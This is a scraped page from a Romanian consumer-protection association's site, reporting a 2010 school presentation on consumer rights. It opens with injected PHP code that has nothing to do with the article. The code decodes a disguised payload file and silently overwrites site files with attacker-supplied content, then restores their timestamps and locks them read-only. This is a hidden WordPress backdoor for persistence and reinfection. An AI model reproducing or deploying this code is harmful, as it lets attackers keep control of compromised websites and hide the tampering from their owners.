$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Proiecte educativ – informative – O noua atitudine

In data de 30 martie 2010, reprezentantii Asociatiei Nationale pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania (A.N.P.C.P.P.S.Romania) au participat la Liceul Economic “ Costin Kiritescu” din Bucuresti la prezentarea proiectelor educativ – informative. Participantii au fost elevi ai claselor IX – XII. Acestia au adresat diverse intrebari reprezentantilor A.N.P.C.P.P.S.Romania pe tema protectiei consumatorilor.

By o9admin